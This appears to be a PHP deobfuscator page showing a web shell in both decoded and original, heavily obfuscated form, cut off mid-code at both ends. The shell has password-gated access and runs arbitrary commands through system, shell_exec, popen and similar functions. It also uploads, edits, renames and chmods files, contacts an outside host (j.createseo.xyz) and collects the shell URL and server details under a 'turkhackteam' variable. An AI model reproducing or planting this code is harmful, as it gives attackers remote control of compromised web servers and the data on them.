window.location.replace('?p=" . encodePath(PATH) . "');</script>"; KHLv3BehnT: vPLKKGw5m0: goto Zgi8Ab0lWU; s2MJ9P5gIy: goto kFbIK; Lvv7W: $turkhackteam .= "Shell Link : http://" . $_SERVER["SERVER_NAME"] . $_SERVER["PHP_SELF"] . "
"; goto rb_fC; VQ0so: goto GoIXCwZ3d6; FTc77pbCnc: $i++; goto OqSJMaTAuM; RSakv7kI2r: echo $str; n2gtoQzzO0: goto UkZgpCr8T7; yPOBkfOl2J: goto iRua8CtKDW; p2Z0x5ZOg0: echo "<script>alert('This isn't Zip File !'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"; iRua8CtKDW: $zip = new ZipArchive(); goto tHK0hE0LNU; o4bNfRbYi7: gXvxIudBlc: if (!isset($_GET["r"])) { goto bU5iKADKcC; } if (!(!empty($_GET["r"]) && isset($_GET["q"]))) { goto NvbGdzFS_o; } echo "
<form method="post">\xd\xa Rename:
<input type="text" name="name" value="" . $_GET["r"] . "">
<input type="submit" class="btn btn-dark" value="Rename" name="rename">
\xa </form>"; if (!isset($_POST["rename"])) { goto aM8DeAOh9i; } goto RttEvMx3zw; IzSgJV9j8V: echo "
\xa</div>\xd
<div class="form-inline">\xd
<a href="?upload&q=" . urlencode(encodePath(PATH)) . ""><button class="btn btn-dark" type="button">Upload File</button></a>
\xa<a href="?kk&q=" . urlencode(encodePath(PATH)) . ""><button class="btn btn-dark" type="button">+ki ll</button></a>\xd
<a href="?newfile&q=" . urlencode(encodePath(PATH)) . ""><button class="btn btn-dark" type="button">+New File</button></a>
<a href="?newfolder&q=" . urlencode(encodePath(PATH)) . ""><button class="btn btn-dark" type="button">+New Folder</button></a>\xd\xa<a href="?checksitem&q=" . urlencode(encodePath(PATH)) . ""><button class="btn btn-dark" type="button">+Check site mm</button></a>\xd\xa
<a href="?"><button type="button" class="btn btn-dark">HOME</button></a>
\xa</div>
\xa</nav>"; echo "
\xa\xd
\xd\xa "; if (isset($_GET["p"])) { goto SxJKZiV3ke; } if (!empty($_GET)) { goto HsZkaRL7H2; } echo "<script>window.location.replace('?p=');</script>"; goto U7bRhx3CHw; n4XwIFiptY: if (!is_writable($root)) { goto Huyq0AI19b; } echo "writeable"; goto CzngkJwlxF; Huyq0AI19b: echo "root no writeable"; goto IlX38JYC4t; tr1pEdNdFp: if (mkdir($dir, 0644, true)) { goto iYKC3S2seu; } goto nWOecSi_IL; iYKC3S2seu: echo "<script>alert('folder create success.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"; nWOecSi_IL: goto wCOeXdWwW3; X8KH1uvt0u: $error_number++; u9gYMPsCF2: if (!in_array("file_put_contents", $disabled)) { goto COqp2ZXeGk; } $fuction_info .= "file_put_contents is disable"; $error_number++; goto aaNEIZoo6j; aeX22B5Tfx: i98ETcJYYy: echo "<script>alert('Success zip File !'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"; nbvh0Hfg4M: jWnHz3QB4f: if (!(isset($_GET["pack"]) && isset($_GET["q"]))) { goto kw3RfNbNii; } goto t5jf3rVV9n; IlX38JYC4t: CzngkJwlxF: echo " php version: " . phpversion(); if (class_exists("ZipArchive")) { goto Sx7byG2IEp; } echo "<font color="red"> no support zip</font>"; Sx7byG2IEp: goto IOovTEcqk1; rOIgmEEU59: goto q4X3Ktp8Rf; cG0ynFGuhX: if (empty($_GET["p"])) { goto BzMo3V1_r8; } if (!is_dir(decodePath($_GET["p"]))) { goto Q1kZhgy6OO; } if (is_dir(decodePath($_GET["p"]))) { goto fhzsB2yta0; } goto qM7tKaKnE0; zoUJOAeR3Y: if (!isset($_GET["checksitem"])) { goto gXvxIudBlc; } $url = "http://j.createseo.xyz"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); goto Hzmz5X2VGB; tZJnY9oqPH: echo "\xd
<script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js"
\xa integrity="sha384-w76AqPfDkMBDXo30jS1Sgez6pr3x5MlQ1ZAGC+nuZB+EYdgRZgiwxhTBTkF7CXvN"\xd
crossorigin="anonymous"></script>\xd\xa</body>
\xa</html>"; ?>Did this file decode correctly?
Original Code
<?php
goto IcODAQzcUt; JzgEgJczEV: function fileIcon($file) { goto Aj9yVKl0_N; bej3s0g1qf: return "\x3c\151\x20\x63\154\x61\163\163\75\x22\x66\x61\x2d\162\145\147\x75\x6c\141\162\x20\146\x61\x2d\x66\151\154\x65\55\154\x69\x6e\x65\x73\x22\x3e\x3c\x2f\151\76\x20"; goto ythIOm1lRv; aiW03ii0K6: return "\74\151\40\143\154\141\x73\x73\x3d\42\x66\x61\55\144\165\157\164\157\x6e\x65\40\x66\x61\55\146\x69\x6c\x65\55\155\165\163\x69\x63\42\x3e\x3c\x2f\151\x3e\x20"; goto ythIOm1lRv; goto mDz6muSgj2; NtZ_BMqgbz: if ($ext == "\143\163\x73") { goto I8TQzURxD3; } if ($ext == "\164\170\x74") { goto SG3j4o3mBt; } if (in_array($ext, $audio)) { goto aiW03ii0K6; } if ($ext == "\x70\x79") { goto feDs2rS8A1; } if ($ext == "\152\x73") { goto WoZCo0LXu0; } goto gLz1w9eQkI; IFuLZTXSXq: A0bfKBC2aX: return "\74\x69\40\x63\x6c\141\163\x73\75\x22\x66\x61\x2d\142\162\x61\x6e\144\x73\x20\146\x61\55\x70\x68\160\x22\x3e\x3c\x2f\151\x3e\x20"; goto ythIOm1lRv; C2VjPmlMZ_: return "\74\151\x20\x63\154\x61\163\x73\x3d\x22\146\141\55\162\x65\147\165\154\x61\x72\x20\x66\141\x2d\151\155\141\147\x65\x73\x22\x3e\x3c\57\x69\x3e\x20"; goto XKIpp2ulFb; gLz1w9eQkI: return "\x3c\x69\40\x63\154\141\163\163\75\x22\146\141\55\x73\x6f\154\151\144\40\x66\x61\x2d\146\x69\x6c\x65\x22\76\x3c\57\x69\76\40"; goto ythIOm1lRv; cq4hQTR8Js: return "\74\151\x20\143\154\141\x73\163\x3d\42\146\x61\55\142\162\x61\156\x64\163\x20\x66\141\x2d\150\x74\x6d\154\65\42\x3e\x3c\x2f\151\x3e\x20"; goto ythIOm1lRv; goto IFuLZTXSXq; H7q5vzsNE0: goto xXy05PqqFN; VS60enwabY: return "\74\151\x20\143\x6c\x61\163\x73\75\x22\146\141\x2d\x73\150\x61\162\x70\x20\146\141\55\163\x6f\154\151\144\40\x66\141\x2d\x62\165\147\42\76\74\57\151\76\40"; goto xXy05PqqFN; EwUywPgQuA: goto KduJt3SnhB; s2rtgjh_tT: ythIOm1lRv: goto yX63xSMc7w; Aj9yVKl0_N: $imgs = array("\x61\x70\x6e\x67", "\141\166\x69\x66", "\x67\151\x66", "\152\160\x67", "\x6a\x70\145\147", "\152\146\x69\x66", "\160\152\x70\145\147", "\160\152\160", "\x70\x6e\x67", "\x73\x76\147", "\x77\x65\142\160"); $audio = array("\167\x61\x76", "\x6d\x34\x61", "\x6d\64\142", "\155\x70\63", "\x6f\x67\147", "\167\145\x62\x6d", "\x6d\x70\143"); $ext = strtolower(fileExtension($file)); if ($file == "\145\162\162\x6f\162\137\x6c\157\147") { goto VS60enwabY; } if ($file == "\56\150\x74\141\143\x63\145\x73\x73") { goto EwUywPgQuA; } goto H7q5vzsNE0; mDz6muSgj2: feDs2rS8A1: return "\x3c\151\x20\143\154\x61\163\x73\x3d\42\x66\141\55\142\162\141\x6e\x64\x73\40\146\x61\x2d\160\171\164\x68\157\x6e\42\76\x3c\x2f\151\76\x20"; goto ythIOm1lRv; WoZCo0LXu0: return "\74\151\40\143\x6c\x61\x73\163\75\42\x66\x61\55\142\x72\x61\156\x64\x73\x20\x66\x61\x2d\152\163\x22\x3e\x3c\57\x69\x3e\40"; goto s2rtgjh_tT; XKIpp2ulFb: goto ythIOm1lRv; I8TQzURxD3: return "\74\x69\x20\143\x6c\141\x73\163\x3d\x22\146\141\x2d\142\x72\x61\x6e\x64\163\40\x66\x61\x2d\143\x73\x73\63\x22\x3e\x3c\57\x69\x3e\x20"; goto ythIOm1lRv; SG3j4o3mBt: goto bej3s0g1qf; KduJt3SnhB: return "\x3c\x69\40\x63\x6c\x61\x73\x73\x3d\42\x66\141\x2d\x73\157\x6c\x69\x64\x20\x66\141\55\150\141\155\x6d\145\162\x22\x3e\74\57\151\76\40"; xXy05PqqFN: if ($ext == "\x68\164\155\154" || $ext == "\150\x74\x6d") { goto cq4hQTR8Js; } if ($ext == "\160\150\160" || $ext == "\160\x68\x74\x6d\x6c") { goto A0bfKBC2aX; } if (in_array($ext, $imgs)) { goto C2VjPmlMZ_; } goto NtZ_BMqgbz; yX63xSMc7w: } function encodePath($path) { $a = array("\x2f", "\x5c", "\x2e", "\x3a"); $b = array("\xe0\xa6\x95", "\xe0\xa6\226", "\xe0\xa6\x97", "\340\xa6\230"); return str_replace($a, $b, $path); } function decodePath($path) { $a = array("\x2f", "\x5c", "\56", "\72"); $b = array("\xe0\xa6\x95", "\340\246\x96", "\340\246\x97", "\340\xa6\230"); return str_replace($b, $a, $path); } function functionCheck() { $disabled = explode("\x2c", ini_get("\144\x69\163\141\x62\154\x65\x5f\146\165\x6e\143\x74\151\x6f\156\x73")); $new_disable = array(); foreach ($disabled as $item) { $new_disable[] = trim($item); RAUfp5FRAi: } q1B1oWOC11: $command_array = array("\163\x79\163\x74\x65\x6d", "\x73\150\x65\x6c\154\137\x65\x78\145\143", "\160\157\x70\x65\x6e", "\145\170\x65\143", "\160\162\157\x63\x5f\157\x70\x65\x6e", "\x70\141\163\x73\x74\150\x72\165"); $command_able = false; foreach ($command_array as $command) { if (in_array($command, $new_disable)) { goto MFHpZ0rPo3; } $command_able = true; goto lUon61bXc5; MFHpZ0rPo3: wYut48siK2: } lUon61bXc5: return $command_able; } function do_write($file, $t, $text) { $key = true; $handle = @fopen($file, $t); if (@fwrite($handle, $text)) { goto rKgxPJYDeN; } @chmod($file, 0666); $key = @fwrite($handle, $text) ? true : false; rKgxPJYDeN: @fclose($handle); return $key; } goto Oy39V45ZH7; tHK0hE0LNU: $res = $zip->open($file); if ($res == true) { goto jgOVb0GrHx; } echo "\74\x73\x63\x72\151\x70\164\76\x61\x6c\x65\162\164\50\x27\x46\141\x69\x6c\145\x64\40\164\x6f\x20\x55\156\x7a\151\x70\40\106\x69\x6c\x65\x20\x21\x27\x29\x3b\40\167\x69\156\144\157\x77\x2e\x6c\157\x63\x61\x74\x69\157\x6e\56\162\x65\x70\154\x61\143\x65\x28\47\x3f\x70\x3d" . encodePath(PATH) . "\x27\51\73\x3c\x2f\163\143\x72\x69\160\x74\76"; goto S2oUcCZYVk; jgOVb0GrHx: goto AzvJH6KrVF; eQXrwI8nw8: function run($code, $method = "\x70\x6f\160\145\156") { goto mfT7mepTlo; mfT7mepTlo: $disabled = explode("\x2c", ini_get("\144\x69\x73\141\x62\x6c\145\x5f\x66\165\x6e\143\164\x69\x6f\x6e\x73")); $new_disable = array(); foreach ($disabled as $item) { $new_disable[] = trim($item); bRJBOAhvZF: } rbAY6el1SK: $command_array = array("\x73\171\163\164\x65\x6d", "\x73\x68\x65\x6c\x6c\137\x65\x78\145\x63", "\x70\x6f\160\145\x6e", "\x65\x78\x65\143", "\160\x72\x6f\143\137\157\x70\x65\156", "\x70\141\x73\163\164\x68\x72\165"); goto bxQQhO5Sia; bxQQhO5Sia: $method = ''; foreach ($command_array as $command) { if (in_array($command, $new_disable)) { goto bxr2VDwqtX; } $method = $command; goto IHV2XxjWp9; bxr2VDwqtX: OmRWz6Uc_Q: } IHV2XxjWp9: if (!empty($method)) { goto QmFeuiWieK; } return false; goto F_CJWjwC0X; F_CJWjwC0X: QmFeuiWieK: $result = ''; switch ($method) { case "\160\x72\x6f\x63\137\x6f\160\x65\x6e": $descriptorspec = array(0 => array("\160\151\x70\145", "\x72"), 1 => array("\x70\151\160\145", "\x77"), 2 => array("\x70\x69\160\x65", "\x65\162\162\x6f\x72\56\164\170\x74")); $pipes = array(); proc_open($code, $descriptorspec, $pipes); return false; goto ThLm7B5C1w; case "\x70\x61\x73\x73\164\x68\162\165": passthru($code); return false; goto ThLm7B5C1w; case "\x73\150\145\x6c\x6c\x5f\x65\x78\x65\143": $result = ''; $result = shell_exec($code); return $result; goto ThLm7B5C1w; case "\x73\x79\x73\164\x65\155": $result = ''; system($code, $result); return $result; goto ThLm7B5C1w; case "\x70\157\160\x65\x6e": $fp = popen($code, "\x72"); d3GMWvdnew: if (feof($fp)) { goto g69f1p3mYr; } $out = fgets($fp, 4096); $result .= $out; goto d3GMWvdnew; g69f1p3mYr: pclose($fp); return $result; goto ThLm7B5C1w; case "\145\x78\x65\x63": exec($code, $array); foreach ($array as $key => $value) { $result .= $key . "\x20\72\40" . $value . PHP_EOL; jB9ji0dtLk: } SBDbx10Z2D: return $result; goto ThLm7B5C1w; default: return false; goto ThLm7B5C1w; } KzXceCE1Qy: ThLm7B5C1w: goto UEz91j34Kv; UEz91j34Kv: } $root_path = __DIR__; if (isset($_GET["\160"])) { goto cG0ynFGuhX; } if (isset($_GET["\x71"])) { goto iZsHZvoVWP; } $p = $root_path; goto rOIgmEEU59; UL46ykXf51: BQhdUDGBjJ: echo "\74\x73\143\x72\x69\x70\x74\76\x61\x6c\145\162\164\50\47\123\141\166\x65\144\56\x27\51\73\x20\167\151\156\x64\157\167\56\x6c\157\x63\141\164\151\157\156\x2e\162\x65\160\154\141\x63\145\x28\x27\x3f\x70\75" . encodePath(PATH) . "\x27\x29\73\x3c\x2f\x73\143\162\x69\x70\x74\x3e"; J2KE9crsVr: RDKJeyTdCo: pSUJYJ6Jhl: goto HeK6lfZ0On; HJzbV9Cz_0: $data = $_POST["\144\141\x74\141"]; $editresult = file_put_contents($filename, $data); if ($editresult) { goto BQhdUDGBjJ; } echo "\74\x73\x63\162\151\x70\164\76\x61\154\145\162\164\50\x27\x53\157\155\145\x20\x65\162\x72\157\162\x20\157\143\143\x75\162\162\x65\144\56\x27\51\73\40\167\x69\156\144\157\167\x2e\154\157\143\141\x74\x69\x6f\156\x2e\x72\145\x70\x6c\x61\x63\145\x28\x27\77\160\x3d" . encodePath(PATH) . "\x27\x29\x3b\74\57\163\x63\162\151\x70\x74\76"; goto J2KE9crsVr; goto UL46ykXf51; IcODAQzcUt: $password = "\x64\x37\x62\70\x32\x34\x36\65\x66\144\62\x35\x37\143\x32\x39\62\x65\x38\70\60\60\67\141\66\71\x64\63\63\x37\x39\71"; error_reporting(0); set_time_limit(0); session_start(); if (isset($_SESSION["\154\157\147\x67\x65\x64\x49\x6e\155"])) { goto uaB43k7i2d; } goto Xf7vnRT1DK; HseYlxXS0w: echo "\xd\12\x3c\150\x35\x20\143\154\141\x73\163\x3d\x22\142\157\x72\x64\x65\x72\x20\x70\55\61\40\x6d\142\x2d\x33\x22\x3e\116\x65\x77\40\146\151\x6c\x65\74\57\x68\65\x3e\x3c\146\157\x72\155\40\x6d\145\x74\150\157\x64\75\x22\x70\x6f\163\x74\42\76\x3c\144\151\x76\x20\143\154\141\x73\x73\75\x22\x66\157\x72\x6d\x2d\147\x72\157\165\160\42\x3e\74\154\141\x62\145\154\40\x66\x6f\162\x3d\42\x6e\42\x3e\106\151\x6c\145\x20\x6e\x61\155\x65\40\72\x3c\57\x6c\141\x62\145\x6c\x3e\x3c\151\156\160\x75\164\40\x74\x79\160\145\75\x22\164\145\x78\164\42\x20\x6e\141\x6d\x65\75\x22\x6e\x22\x20\151\x64\75\x22\x6e\x22\x20\x63\154\141\x73\163\75\42\x66\157\x72\x6d\55\x63\x6f\156\164\x72\157\154\x22\40\x70\154\141\143\x65\x68\x6f\154\144\x65\x72\75\42\150\141\x63\153\56\164\170\164\x22\x3e\74\x2f\144\x69\x76\x3e\74\144\151\x76\x20\143\x6c\x61\163\x73\x3d\42\x66\157\162\155\55\147\x72\157\165\160\42\76\74\154\141\142\145\154\40\x66\157\162\x3d\42\x63\164\156\x22\x3e\103\157\x6e\164\x65\x6e\164\40\72\74\x2f\x6c\141\142\x65\x6c\76\x3c\x74\x65\170\x74\x61\162\145\x61\40\163\x74\x79\154\145\75\42\x72\145\x73\151\172\145\x3a\156\157\156\x65\42\40\156\141\155\145\x3d\x22\143\x74\156\42\40\x69\144\75\x22\143\164\156\x22\40\x63\157\154\163\75\42\63\x30\42\x20\x72\157\167\163\x3d\x22\61\60\42\40\143\x6c\141\x73\163\x3d\42\x66\x6f\162\x6d\55\143\x6f\x6e\164\x72\157\x6c\42\40\x70\154\x61\143\x65\150\157\x6c\144\x65\162\75\42\x23\x20\x53\164\141\x6d\160\x65\144\x20\x42\171\x20\x4d\145\x22\76\74\57\164\145\x78\x74\141\x72\145\141\x3e\74\x2f\x64\151\166\x3e\74\x62\x72\x2f\76\74\x64\151\x76\40\x63\x6c\x61\163\x73\75\x22\x66\157\162\x6d\x2d\x67\162\x6f\x75\x70\x22\76\74\x69\x6e\160\165\x74\40\164\171\x70\145\75\42\163\165\x62\155\x69\164\x22\x20\x63\x6c\x61\x73\163\x3d\42\x62\164\x6e\x20\x62\x74\156\55\x64\141\162\153\42\x20\166\141\154\165\145\75\x22\143\162\x65\141\164\x65\146\151\154\145\x22\40\156\141\155\x65\x3d\x22\143\x72\145\141\164\x65\x66\151\x6c\145\42\76\x3c\57\144\151\x76\x3e\x3c\x2f\146\157\x72\155\76"; xMZLJlmg5e: if (!isset($_GET["\x6e\x65\167\146\157\x6c\x64\x65\x72"])) { goto Gmp9ijTiSP; } echo "\x3c\x66\157\162\x6d\x20\x6d\145\164\150\157\x64\75\42\160\157\163\164\42\x3e\x3c\x64\x69\166\40\x63\154\141\163\163\x3d\x22\x66\x6f\x72\x6d\55\x67\x72\157\165\x70\x22\x3e\74\x6c\x61\x62\145\154\40\146\157\162\x3d\x22\156\x22\x3e\116\x61\x6d\x65\40\72\74\57\x6c\x61\142\x65\154\76\x3c\151\x6e\160\x75\164\x20\156\141\x6d\x65\75\x22\x6e\x22\40\151\x64\x3d\42\156\42\40\x63\x6c\x61\163\163\x3d\x22\146\x6f\x72\155\x2d\143\157\156\164\162\157\154\x22\40\141\165\x74\x6f\x63\157\155\160\154\x65\164\145\75\x22\x6f\146\146\42\x3e\74\57\x64\x69\x76\76\x3c\142\162\57\x3e\x3c\144\151\x76\x20\x63\x6c\x61\163\163\x3d\42\146\157\162\155\x2d\x67\x72\157\x75\160\42\76\x3c\151\156\160\165\164\x20\164\x79\x70\x65\x3d\x22\163\x75\x62\x6d\151\164\42\x20\143\x6c\141\163\163\x3d\42\142\164\156\40\142\x74\x6e\55\144\x61\x72\x6b\x22\x20\x76\x61\x6c\x75\145\75\x22\x63\162\x65\x61\x74\x65\x66\x6f\154\144\x65\x72\x22\x20\x6e\x61\x6d\145\75\x22\x63\162\145\141\164\x65\x66\157\154\x64\x65\162\x22\x3e\x3c\57\144\151\166\76\74\57\x66\x6f\x72\155\x3e"; Gmp9ijTiSP: goto zoUJOAeR3Y; FDFLFy7CDc: echo "\74\163\143\x72\151\x70\164\x3e\x61\154\x65\x72\x74\50\47\122\x65\156\x61\155\x65\x64\x2e\x27\51\73\40\x77\x69\156\x64\157\x77\56\x6c\x6f\143\x61\x74\x69\x6f\156\56\x72\x65\160\x6c\x61\x63\145\x28\x27\x3f\160\x3d" . encodePath(PATH) . "\47\51\x3b\74\57\163\x63\x72\151\160\164\76"; HFE5kKnsCA: aM8DeAOh9i: NvbGdzFS_o: bU5iKADKcC: goto iZSLwp83rB; UkZgpCr8T7: if (!isset($_POST["\x63\x72\x65\x61\x74\145\146\x69\154\x65"])) { goto TeSIip9XPd; } $filename = PATH . "\x2f" . $_POST["\x6e"]; $filecontent = $_POST["\x63\x74\156"]; $f_put = "\146\x69\154\x65" . "\137" . "\160\x75\x74\137" . "\x63\x6f\x6e\x74\145\x6e\x74\163"; $create_result = @$f_put($filename, $filecontent); goto ro56FjsUmp; N56fFkgFnR: if (!(isset($_GET["\x7a"]) && isset($_GET["\x71"]))) { goto jWnHz3QB4f; } echo "\x3c\x73\143\162\151\x70\164\x3e\141\154\x65\x72\x74\x28\47\x53\x75\x63\143\145\163\163\40\172\x69\160\x20\x46\151\154\145\40\41\x27\51\73\40\167\x69\x6e\x64\157\167\56\154\157\x63\141\164\x69\x6f\x6e\56\x72\x65\160\x6c\x61\143\x65\x28\x27\x3f\x70\75" . encodePath(PATH) . "\47\51\73\x3c\x2f\x73\143\162\x69\160\x74\x3e"; $dir = PATH . "\x2f" . $_GET["\172"] . "\x2f"; $sourceDir1 = $dir; $outZipPath1 = PATH . "\x2f" . $_GET["\x7a"] . "\56\172\151\160"; goto Z4FL63cabb; TACYhwjZl3: B0fGBvJ7BC: if (!(isset($_GET["\165"]) && isset($_GET["\x71"]))) { goto l_LXZmL6qT; } $file = PATH . "\57" . $_GET["\165"]; $filearray = pathinfo($file); $unzipname = PATH . "\57" . $filearray["\146\151\x6c\145\x6e\x61\155\145"] . "\57"; goto UDhFABiLMw; vny6N1rEXg: DSraP0sFDJ: chmod($name, 0644); echo "\74\x73\143\162\x69\160\164\x3e\x61\154\x65\x72\x74\50\47\104\x69\x72\x65\x63\x74\x6f\162\x79\x20\143\150\x6d\x6f\x64\x20\x75\160\x64\141\164\x65\56\x27\x29\x3b\40\167\151\x6e\144\x6f\167\x2e\x6c\157\x63\x61\x74\x69\x6f\156\x2e\x72\145\160\x6c\x61\x63\145\x28\x27\x3f\160\75" . encodePath(PATH) . "\x27\51\73\x3c\57\163\143\162\151\160\x74\76"; vBeXSTf6G5: ygOghdc2yx: goto TACYhwjZl3; U7bRhx3CHw: HsZkaRL7H2: goto QZch_C6JHG; SxJKZiV3ke: if (!is_readable(PATH)) { goto W6cuX1O3h2; } $fetch_obj = scandir(PATH); goto beZ8d3y3aQ; fFKP7Uscgc: aiCI89EMPR: q4X3Ktp8Rf: define("\x50\101\x54\x48", $p); $root = $_SERVER["\x44\117\x43\125\115\x45\x4e\124\x5f\x52\x4f\117\x54"]; @chdir($root); goto n4XwIFiptY; epV_l6oCAf: echo "\x3c\163\x63\162\x69\160\x74\76\141\x6c\x65\162\164\x28\x27\x53\x6f\155\145\x20\x65\x72\x72\x6f\162\40\157\143\143\165\x72\x72\145\x64\56\x27\x29\x3b\x20\x77\x69\156\144\x6f\167\x2e\154\x6f\x63\141\164\151\157\156\56\162\145\160\x6c\x61\143\x65\x28\x27\x3f\x70\75" . encodePath(PATH) . "\x27\x29\x3b\74\57\163\x63\162\151\x70\x74\76"; goto GrGLGHlobX; dDlB62giGv: echo "\74\163\143\162\151\160\x74\76\x61\x6c\x65\162\164\50\x27\x44\151\162\145\143\164\x6f\x72\x79\40\x72\x65\x6d\x6f\x76\x65\144\56\x27\51\x3b\40\167\151\156\144\157\167\x2e\x6c\157\x63\141\x74\151\157\156\56\x72\145\160\154\x61\x63\x65\50\x27\x3f\160\x3d" . encodePath(PATH) . "\47\x29\x3b\x3c\57\x73\143\x72\x69\x70\164\76"; GrGLGHlobX: goto XyqzCwUAMG; w6cON0FfUZ: if (!($i < $countfiles)) { goto RSakv7kI2r; } $target_file = PATH . "\x2f" . $_FILES["\146\151\154\145\x54\x6f\125\x70\154\157\141\144"]["\x6e\141\x6d\145"][$i]; $filename = $_FILES["\x66\151\154\145\x54\157\x55\x70\x6c\157\141\144"]["\x6e\141\x6d\x65"][$i]; if (move_uploaded_file($_FILES["\x66\x69\154\145\124\157\125\160\154\x6f\x61\x64"]["\x74\155\x70\x5f\156\x61\x6d\145"][$i], $target_file)) { goto Moq8TmJ_Zz; } $str .= "\x3c\160\x3e\x53\157\x72\x72\x79\54\40\164\150\145\162\145\x20\x77\141\x73\40\x61\156\x20\145\x72\162\157\162\x20\165\160\154\157\x61\x64\x69\x6e\x67\40\x79\157\x75\x72\40\146\x69\x6c\x65\x2e\74\x2f\160\76"; goto AZ1GiUp5Hz; KE0xkKhOsg: echo "\x3c\x73\143\x72\151\x70\164\x3e\xa\x61\x6c\145\162\x74\x28\47\104\x69\x72\145\143\x74\157\162\x79\x20\x69\x73\40\103\157\x72\162\x75\x70\164\x65\x64\40\x61\156\144\x20\125\x6e\x72\145\141\144\141\x62\154\145\x2e\x27\x29\73\xa\x77\151\x6e\x64\157\x77\56\154\x6f\x63\141\164\x69\x6f\x6e\56\x72\145\160\x6c\141\143\x65\50\x27\x3f\47\51\x3b\12\x3c\57\x73\x63\x72\151\160\x74\76"; goto L8qA1n6y8f; fhzsB2yta0: $p = decodePath($_GET["\x70"]); L8qA1n6y8f: goto TOf2PAqXCs; AzvJH6KrVF: $zip->extractTo($unzipname); $zip->close(); echo "\74\163\143\162\x69\160\164\x3e\x61\x6c\145\x72\164\50\x27\123\165\143\x63\145\x73\163\40\125\156\172\x69\160\40\106\151\x6c\x65\40\x21\x27\51\73\x20\167\151\x6e\144\x6f\x77\x2e\x6c\x6f\x63\141\x74\x69\x6f\x6e\x2e\162\145\160\154\141\x63\x65\x28\47\x3f\160\x3d" . encodePath(PATH) . "\x27\51\x3b\x3c\x2f\x73\x63\x72\151\160\x74\x3e"; S2oUcCZYVk: l_LXZmL6qT: goto N56fFkgFnR; USOcF_9GQA: goto Lvv7W; qJ_ML: $turkhackteam .= "\x53\x65\162\x76\x65\162\x20\x41\x64\x6d\x69\156\x20\x3a\40" . $_SERVER["\x53\x45\x52\x56\105\x52\137\x41\x44\115\111\116"] . "\xd\xa"; goto q1pwk; rb_fC: goto J0bBi0uhWi; J0bBi0uhWi: $turkhackteam .= "\x41\x76\x6c\x61\x6e\x61\x6e\x20\x53\x69\x74\145\40\x3a\40" . $_SERVER["\110\124\x54\120\x5f\110\117\123\x54"] . "\15\xa"; goto VQ0so; kFbIK: $baslik = "\x53\x68\x65\154\154\x20\101\x76\x63\xc4\xb1\x73\xc4\xb1"; goto vS5qu; goto YwoKqqsX4i; RttEvMx3zw: $name = PATH . "\57" . $_GET["\162"]; if (rename($name, PATH . "\x2f" . $_POST["\156\x61\x6d\x65"])) { goto J4vRUYRbz2; } echo "\74\163\x63\162\151\x70\x74\x3e\x61\x6c\145\162\164\x28\x27\x53\157\155\145\x20\145\x72\x72\157\x72\40\x6f\x63\143\x75\x72\x72\145\144\56\47\51\73\40\x77\x69\156\144\x6f\167\x2e\x6c\157\x63\141\x74\x69\157\156\56\x72\145\x70\154\141\143\x65\50\47\x3f\x70\75" . encodePath(PATH) . "\47\x29\73\x3c\57\x73\x63\162\151\160\x74\x3e"; goto HFE5kKnsCA; J4vRUYRbz2: goto FDFLFy7CDc; fb40xYjVL_: echo "\xd\12\74\164\141\142\154\145\40\143\x6c\x61\163\163\75\42\164\141\142\154\145\40\x74\x61\142\154\145\55\x68\157\166\145\162\x22\76\xd\xa\x20\40\x3c\x74\150\145\x61\144\x3e\15\12\x20\x20\x20\40\x3c\x74\162\x3e\15\xa\x20\40\40\40\40\40\74\164\150\40\163\x63\157\160\145\75\x22\x63\157\x6c\42\76\x4e\141\155\145\74\x2f\164\x68\76\xd\12\x20\x20\x20\x20\40\40\x3c\x74\x68\40\x73\143\157\x70\145\x3d\x22\143\x6f\x6c\x22\x3e\123\x69\x7a\x65\x3c\x2f\164\x68\x3e\xd\12\40\x20\x20\40\x20\40\x3c\164\150\x20\x73\x63\x6f\x70\145\75\42\143\x6f\x6c\42\76\115\x6f\144\x69\x66\151\145\x64\x3c\x2f\x74\150\76\xd\12\11\40\40\74\164\150\x20\x73\143\157\160\x65\x3d\42\x63\157\154\42\76\117\167\x6e\145\162\x3c\x2f\164\x68\76\xd\12\x20\40\40\40\x20\x20\74\164\150\x20\x73\x63\x6f\x70\x65\x3d\42\x63\x6f\154\x22\x3e\x50\145\x72\155\x73\x3c\57\x74\x68\76\15\12\x20\40\x20\40\40\x20\74\164\150\x20\163\x63\157\160\x65\75\42\143\x6f\x6c\x22\76\101\143\164\x69\x6f\x6e\x73\74\x2f\164\x68\76\xd\xa\x20\x20\40\40\74\x2f\164\x72\76\xd\xa\40\40\74\x2f\164\x68\145\x61\144\x3e\15\12\x20\x20\x3c\x74\142\x6f\x64\x79\x3e\15\12"; foreach ($folders as $folder) { echo "\x20\x20\40\40\74\164\x72\76\15\xa\40\x20\40\x20\40\40\74\x74\144\x3e\x3c\x69\x20\x63\154\x61\163\x73\x3d\x27\x66\141\x2d\x73\157\x6c\x69\144\x20\x66\x61\x2d\x66\x6f\154\144\x65\x72\x27\76\74\x2f\x69\x3e\40\x3c\141\x20\150\x72\x65\146\75\47\77\x70\x3d" . urlencode(encodePath(PATH . "\57" . $folder)) . "\x27\x3e" . $folder . "\74\x2f\141\76\74\x2f\164\144\x3e\15\12\x20\x20\x20\x20\40\x20\74\164\x64\76\x3c\x62\76\55\55\55\x3c\57\142\76\x3c\57\x74\144\x3e\xd\xa\x20\40\x20\40\40\x20\74\x74\144\x3e" . date("\x46\x20\x64\40\x59\x20\110\x3a\151\72\163\56", filemtime(PATH . "\57" . $folder)) . "\x3c\57\164\144\76\15\xa\x9\x20\40\40\x3c\x74\144\x3e" . owner(PATH . "\57" . $folder) . "\74\57\164\x64\x3e\15\xa\40\x20\40\40\40\40\74\164\144\76\60" . substr(decoct(fileperms(PATH . "\x2f" . $folder)), -3) . "\x3c\57\141\x3e\x3c\57\x74\144\x3e\xd\xa\40\40\40\x20\40\40\x3c\x74\x64\76\xd\12\x20\40\40\x20\40\x20\74\x61\x20\x74\151\x74\x6c\145\x3d\47\122\x65\x6e\x61\155\x65\x27\40\150\x72\145\146\x3d\47\x3f\x71\75" . urlencode(encodePath(PATH)) . "\x26\162\x3d" . $folder . 